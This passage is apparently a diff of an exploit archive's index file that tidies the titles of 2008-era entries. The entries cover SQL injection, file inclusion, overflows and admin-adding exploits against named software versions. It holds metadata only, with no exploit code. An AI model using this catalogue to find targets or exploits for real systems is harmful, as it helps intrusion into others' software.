5277,platforms/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 5278,platforms/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 5279,platforms/php/webapps/5279.txt,"Mambo Component accombo 1.x - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 @@ -4929,7 +4929,7 @@ id,file,description,date,author,platform,type,port 5286,platforms/php/webapps/5286.txt,"ASPapp Knowledge Base - SQL Injection",2008-03-20,xcorpitx,php,webapps,0 5287,platforms/windows/local/5287.txt,"Microsoft Excel - Code Execution (MS08-014)",2008-03-21,zha0,windows,local,0 5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 - Multiple Local File Inclusion",2008-03-21,0x90,php,webapps,0 -5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - (default pass) Remote Root Exploit",2008-03-21,"Pranav Joshi",hardware,remote,0 +5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - (Default Password) Remote Root Exploit",2008-03-21,"Pranav Joshi",hardware,remote,0 5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - 'cid' SQL Injection",2008-03-21,S@BUN,php,webapps,0 5291,platforms/php/webapps/5291.txt,"D.E. Classifieds - 'cat_id' SQL Injection",2008-03-21,S@BUN,php,webapps,0 5292,platforms/php/webapps/5292.py,"PostNuke 0.764 - Blind SQL Injection",2008-03-21,The:Paradox,php,webapps,0 @@ -4955,12 +4955,12 @@ id,file,description,date,author,platform,type,port 5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 - (mod.php) Local File Inclusion",2008-03-25,girex,php,webapps,0 5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0 5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69 -5315,platforms/windows/remote/5315.py,"Quick TFTP Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69 +5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service",2008-03-26,muts,windows,dos,0 5317,platforms/php/webapps/5317.txt,"JAF CMS 4.0 RC2 - Multiple Remote File Inclusion",2008-03-26,CraCkEr,php,webapps,0 5318,platforms/php/webapps/5318.txt,"Joomla! Component MyAlbum 1.0 - (album) SQL Injection",2008-03-28,parad0x,php,webapps,0 5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x - 'user.php' Security Code Bypass / Add Administrator",2008-03-28,NTOS-Team,php,webapps,0 -5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - PPT File Buffer Overflow (MS08-016)",2008-03-30,Marsu,windows,local,0 +5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - '.PPT' File Buffer Overflow (MS08-016)",2008-03-30,Marsu,windows,local,0 5321,platforms/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow PoC / Denial of Service",2008-03-30,Marsu,windows,dos,0 5322,platforms/php/webapps/5322.txt,"Smoothflash - 'admin_view_image.php cid' SQL Injection",2008-03-30,S@BUN,php,webapps,0 5323,platforms/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta - Remote File Inclusion",2008-03-30,bd0rk,php,webapps,0 @@ -4982,14 +4982,14 @@ id,file,description,date,author,platform,type,port 5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0 -5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510 +5342,platforms/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0 5345,platforms/php/webapps/5345.txt,"Joomla! Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0 5346,platforms/windows/local/5346.pl,"XnView 1.92.1 - (FontName) Slideshow Buffer Overflow",2008-04-02,haluznik,windows,local,0 5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - (prefixdir) Local File Inclusion",2008-04-02,w0cker,php,webapps,0 5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion",2008-04-02,w0cker,php,webapps,0 -5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 - (SP6) SLN File Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0 +5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 (SP6) - .SLN File Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0 5350,platforms/php/webapps/5350.txt,"KwsPHP Module Galerie - (id_gal) SQL Injection",2008-04-03,S@BUN,php,webapps,0 5351,platforms/php/webapps/5351.txt,"KwsPHP Module Archives - 'id' SQL Injection",2008-04-03,S@BUN,php,webapps,0 5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash (cat) 1.0 - SQL Injection",2008-04-03,Houssamix,php,webapps,0 @@ -5001,7 +5001,7 @@ id,file,description,date,author,platform,type,port 5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - (reed) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5360,platforms/php/webapps/5360.txt,"sabros.us 1.75 - (thumbnails.php) Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0 -5361,platforms/windows/local/5361.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.DSR' File Local Buffer Overflow",2008-04-04,shinnai,windows,local,0 +5361,platforms/windows/local/5361.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.DSR' File Local Buffer Overflow",2008-04-04,shinnai,windows,local,0 5362,platforms/php/webapps/5362.txt,"Comdev News Publisher - SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5363,platforms/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - (photo_id) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 @@ -5036,7 +5036,7 @@ id,file,description,date,author,platform,type,port 5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - (root) Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 -5396,platforms/windows/dos/5396.txt,"hp openview nnm 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 +5396,platforms/windows/dos/5396.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0 5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php) File Disclosure",2008-04-07,Stack,php,webapps,0 @@ -5067,7 +5067,7 @@ id,file,description,date,author,platform,type,port 5425,platforms/php/webapps/5425.pl,"LightNEasy 1.2 - (no database) Remote Hash Retrieve Exploit",2008-04-10,girex,php,webapps,0 5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'popup_img.php fotoID' SQL Injection",2008-04-10,S@BUN,php,webapps,0 5427,platforms/windows/dos/5427.pl,"Borland Interbase 2007 - ibserver.exe Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0 -5428,platforms/php/webapps/5428.txt,"PHPKB 1.5 Knowledge Base - 'ID' SQL Injection",2008-04-11,parad0x,php,webapps,0 +5428,platforms/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection",2008-04-11,parad0x,php,webapps,0 5429,platforms/php/webapps/5429.txt,"NewsOffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0 5431,platforms/php/webapps/5431.txt,"Joomla! Component JoomlaXplorer 1.6.2 - Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0 @@ -5081,10 +5081,10 @@ id,file,description,date,author,platform,type,port 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling",2008-04-13,t0pP8uZz,php,webapps,0 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Blind SQL Injection",2008-04-13,Lidloses_Auge,php,webapps,0 5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS - SQL Injection",2008-04-14,cO2,php,webapps,0 -5442,platforms/windows/local/5442.cpp,"Microsoft Windows GDI - Image Parsing Stack Overflow (MS08-021)",2008-04-14,Lamhtz,windows,local,0 +5442,platforms/windows/local/5442.cpp,"Microsoft Windows - GDI Image Parsing Stack Overflow (MS08-021)",2008-04-14,Lamhtz,windows,local,0 5443,platforms/php/webapps/5443.txt,"SmallBiz eShop - (content_id) SQL Injection",2008-04-14,Stack,php,webapps,0 5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 - (index.php cat) SQL Injection",2008-04-14,"SoSo H H",php,webapps,0 -5445,platforms/windows/remote/5445.cpp,"HP OpenView NNM 7.5.1 - ovalarmsrv.exe Remote Overflow",2008-04-14,Heretic2,windows,remote,2954 +5445,platforms/windows/remote/5445.cpp,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - ovalarmsrv.exe Remote Overflow",2008-04-14,Heretic2,windows,remote,2954 5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - (article) SQL Injection",2008-04-14,Crackers_Child,php,webapps,0 5447,platforms/php/webapps/5447.txt,"Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections",2008-04-14,JosS,php,webapps,0 5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 - poll SQL Injection",2008-04-14,S@BUN,php,webapps,0 @@ -5138,7 +5138,7 @@ id,file,description,date,author,platform,type,port 5496,platforms/windows/remote/5496.html,"Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods",2008-04-25,callAX,windows,remote,0 5497,platforms/php/webapps/5497.txt,"Joomla! Component Joomla-Visites 1.1 RC2 - Remote File Inclusion",2008-04-25,NoGe,php,webapps,0 5498,platforms/windows/local/5498.py,"Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow",2008-04-25,j0rgan,windows,local,0 -5499,platforms/php/webapps/5499.txt,"siteman 2.x - (Code Execution / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-04-26,"Khashayar Fereidani",php,webapps,0 +5499,platforms/php/webapps/5499.txt,"Siteman 2.x - (Code Execution / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-04-26,"Khashayar Fereidani",php,webapps,0 5500,platforms/php/webapps/5500.txt,"PostNuke Module pnFlashGames 2.5 - SQL Injection",2008-04-26,Kacper,php,webapps,0 5501,platforms/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 - Remote File Inclusion",2008-04-26,RoMaNcYxHaCkEr,php,webapps,0 5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 - 'postview.php' SQL Injection (1)",2008-04-26,U238,php,webapps,0 @@ -5226,7 +5226,7 @@ id,file,description,date,author,platform,type,port 5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 - (featured_article.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5591,platforms/php/webapps/5591.txt,"AJ Auction 6.2.1 - (classifide_ad.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 -5594,platforms/php/webapps/5594.txt,"ZeusCart 2.0 - (category_list.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 +5594,platforms/php/webapps/5594.txt,"ZeusCart 2.0 - 'category_list.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5595,platforms/php/webapps/5595.txt,"clanlite 2.x - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0 5596,platforms/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0 @@ -5266,9 +5266,9 @@ id,file,description,date,author,platform,type,port 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 - Multiple SQL Injections",2008-05-15,cOndemned,php,webapps,0 5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS - (default.asp id) SQL Injection",2008-05-16,JosS,asp,webapps,0 -5634,platforms/php/webapps/5634.htm,"Zomplog 3.8.2 - (newuser.php) Arbitrary Add Admin",2008-05-16,ArxWolf,php,webapps,0 +5634,platforms/php/webapps/5634.htm,"Zomplog 3.8.2 - 'newuser.php' Arbitrary Add Admin",2008-05-16,ArxWolf,php,webapps,0 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - (post_id) SQL Injection",2008-05-16,Stack,php,webapps,0 -5636,platforms/php/webapps/5636.txt,"Zomplog 3.8.2 - (force_download.php) File Disclosure",2008-05-16,Stack,php,webapps,0 +5636,platforms/php/webapps/5636.txt,"Zomplog 3.8.2 - 'force_download.php' File Disclosure",2008-05-16,Stack,php,webapps,0 5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 - (msnum) Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps,0 5638,platforms/php/webapps/5638.txt,"How2ASP.net WebBoard 4.1 - SQL Injection",2008-05-17,"CWH Underground",php,webapps,0 5639,platforms/php/webapps/5639.pl,"FicHive 1.0 - (category) Blind SQL Injection",2008-05-17,His0k4,php,webapps,0 @@ -5281,7 +5281,7 @@ id,file,description,date,author,platform,type,port 5646,platforms/php/webapps/5646.txt,"easycms 0.4.2 - Multiple Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps,0 5647,platforms/php/webapps/5647.txt,"GNU/Gallery 1.1.1.0 - 'admin.php' Local File Inclusion",2008-05-18,t0pP8uZz,php,webapps,0 5648,platforms/php/webapps/5648.pl,"MeltingIce File System 1.0 - Arbitrary Add User Exploit",2008-05-18,t0pP8uZz,php,webapps,0 -5649,platforms/php/webapps/5649.pl,"PHP AGTC-Membership System 1.1a - Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0 +5649,platforms/php/webapps/5649.pl,"PHP-AGTC Membership System 1.1a - Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0 5650,platforms/php/webapps/5650.pl,"MyPicGallery 1.0 - Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0 5651,platforms/php/webapps/5651.txt,"microssys CMS 1.5 - Remote File Inclusion",2008-05-19,Raz0r,php,webapps,0 5652,platforms/php/webapps/5652.pl,"AlkalinePHP 0.80.00 Beta - (thread.php id) SQL Injection",2008-05-19,Stack,php,webapps,0 @@ -5327,7 +5327,7 @@ id,file,description,date,author,platform,type,port 5693,platforms/php/webapps/5693.txt,"CMS from Scratch 1.1.3 - (image.php) Directory Traversal",2008-05-29,Stack,php,webapps,0 5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,623 5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,8800 -5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d - SQL Injection",2008-05-29,Stack,php,webapps,0 +5696,platforms/php/webapps/5696.pl,"phpBookingCalendar 10 d - SQL Injection",2008-05-29,Stack,php,webapps,0 5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - 'FCKeditor' Arbitrary File Upload",2008-05-29,Stack,php,webapps,0 5698,platforms/php/webapps/5698.txt,"HiveMaker Professional 1.0.2 - 'cid' SQL Injection",2008-05-30,K-159,php,webapps,0 5699,platforms/php/webapps/5699.txt,"PsychoStats 2.3.3 - Multiple SQL Injections",2008-05-31,Mr.SQL,php,webapps,0 @@ -5349,7 +5349,7 @@ id,file,description,date,author,platform,type,port 5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0 5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0 -5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 +5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 5719,platforms/php/webapps/5719.pl,"Joomla! Component JooBB 0.5.9 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0 5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22 5721,platforms/php/webapps/5721.pl,"Joomla! Component acctexp 0.12.x - Blind SQL Injection",2008-06-02,His0k4,php,webapps,0 @@ -5412,7 +5412,7 @@ id,file,description,date,author,platform,type,port 5780,platforms/asp/webapps/5780.txt,"ASP Download 1.03 - Arbitrary Change Administrator Account",2008-06-10,Zigma,asp,webapps,0 5781,platforms/asp/webapps/5781.txt,"Todd Woolums ASP News Management 2.2 - SQL Injection",2008-06-10,Bl@ckbe@rD,asp,webapps,0 5782,platforms/php/webapps/5782.txt,"TNT Forum 0.9.4 - Local File Inclusion",2008-06-10,"CWH Underground",php,webapps,0 -5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar - (board) SQL Injection",2008-06-10,RMx,php,webapps,0 +5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar - 'board' SQL Injection",2008-06-10,RMx,php,webapps,0 5784,platforms/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusion",2008-06-11,"CWH Underground",php,webapps,0 5785,platforms/php/webapps/5785.txt,"eFiction 3.0 - (toplists.php list) SQL Injection",2008-06-11,Mr.SQL,php,webapps,0 5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add Admin",2008-06-11,"CWH Underground",php,webapps,0 @@ -5420,7 +5420,7 @@ id,file,description,date,author,platform,type,port 5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,php,webapps,0 5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Blind SQL Injection",2008-06-11,anonymous,php,webapps,0 5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161 -5791,platforms/php/webapps/5791.txt,"gravity board x 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 +5791,platforms/php/webapps/5791.txt,"Gravity Board X 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusion",2008-06-12,"CWH Underground",php,webapps,0 5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - 'TextOut.dll' ActiveX Remote Buffer Overflow",2008-06-12,Nine:Situations:Group,windows,remote,0 5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - 'results.php' SQL Injection",2008-06-12,anonymous,php,webapps,0 @@ -5498,7 +5498,7 @@ id,file,description,date,author,platform,type,port 5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - (cate_id) SQL Injection",2008-06-19,"Hussin X",php,webapps,0 5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' SQL Injection",2008-06-19,"Hussin X",php,webapps,0 5869,platforms/php/webapps/5869.txt,"virtual support office-xp 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 -5870,platforms/php/webapps/5870.txt,"gl-sh deaf forum 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 +5870,platforms/php/webapps/5870.txt,"GL-SH Deaf Forum 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 5873,platforms/php/webapps/5873.txt,"Lightweight news portal [lnp] 1.0b - Multiple Vulnerabilities",2008-06-20,storm,php,webapps,0 @@ -5637,7 +5637,7 @@ id,file,description,date,author,platform,type,port 6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' SQL Injection",2008-07-06,"HIva Team",php,webapps,0 6011,platforms/php/webapps/6011.txt,"ContentNow 1.4.1 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0 6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80 -6013,platforms/osx/remote/6013.pl,"Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0 +6013,platforms/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0 6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (1)",2008-07-07,Hamtaro,php,webapps,0 6015,platforms/php/webapps/6015.txt,"WebXell Editor 0.1.3 - Arbitrary File Upload",2008-07-07,"CWH Underground",php,webapps,0 6016,platforms/php/webapps/6016.pl,"Fuzzylime CMS 3.01a - (file) Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 @@ -5649,7 +5649,7 @@ id,file,description,date,author,platform,type,port 6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin",2008-07-08,"CWH Underground",php,webapps,0 6024,platforms/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6025,platforms/php/webapps/6025.txt,"Joomla! Component com_content 1.0.0 - 'itemID' SQL Injection",2008-07-08,unknown_styler,php,webapps,0 -6026,platforms/linux/remote/6026.pl,"trixbox - (langChoice) Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 +6026,platforms/linux/remote/6026.pl,"Trixbox - (langChoice) Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script 4.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - (sIncPath) Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6029,platforms/multiple/dos/6029.txt,"Mozilla Firefox/Evince/EOG/Gimp - '.SVG' Denial of Service (PoC)",2008-07-08,"Kristian Hermansen",multiple,dos,0 @@ -5661,7 +5661,7 @@ id,file,description,date,author,platform,type,port 6035,platforms/php/webapps/6035.txt,"DreamNews Manager - 'id' SQL Injection",2008-07-10,"Hussin X",php,webapps,0 6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - (dirDepth) Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0 6037,platforms/php/webapps/6037.txt,"phpDatingClub - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0 -6039,platforms/windows/local/6039.c,"Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow",2008-07-11,Shinnok,windows,local,0 +6039,platforms/windows/local/6039.c,"Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow",2008-07-11,Shinnok,windows,local,0 6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injection",2008-07-11,"Nu Am Bani",php,webapps,0 6041,platforms/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 Beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,php,webapps,0 6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo",2008-10-20,StAkeR,php,webapps,0 @@ -5717,7 +5717,7 @@ id,file,description,date,author,platform,type,port 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0 6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0 6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 -6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0 +6097,platforms/php/webapps/6097.txt,"Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0 6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.(1.0.4) - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0 6099,platforms/php/webapps/6099.txt,"Siteframe - 'folder.php id' SQL Injection",2008-07-18,n0ne,php,webapps,0 6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80 @@ -5831,12 +5831,12 @@ id,file,description,date,author,platform,type,port 6211,platforms/php/webapps/6211.txt,"Quate CMS 0.3.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps,0 6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - (searchid) SQL Injection",2008-08-06,james,php,webapps,0 -6215,platforms/php/webapps/6215.txt,"Ppim 1.0 - (Arbitrary File Delete / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-10,BeyazKurt,php,webapps,0 +6215,platforms/php/webapps/6215.txt,"pPIM 1.0 - (Arbitrary File Delete / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-10,BeyazKurt,php,webapps,0 6216,platforms/windows/dos/6216.html,"Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow (PoC)",2008-08-10,"Guido Landi",windows,dos,0 6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,windows,remote,0 6218,platforms/multiple/dos/6218.txt,"Sun xVM VirtualBox < 1.6.4 - Privilege Escalation (PoC)",2008-08-10,"Core Security",multiple,dos,0 6219,platforms/php/webapps/6219.txt,"e107 <= 0.7.11 - Arbitrary Variable Overwriting",2008-08-10,"GulfTech Security",php,webapps,0 -6220,platforms/windows/remote/6220.html,"Cisco WebEx Meeting Manager - 'atucfobj.dll' ActiveX Remote Buffer Overflow",2008-08-10,"Guido Landi",windows,remote,0 +6220,platforms/windows/remote/6220.html,"Cisco WebEx Meeting Manager UCF - 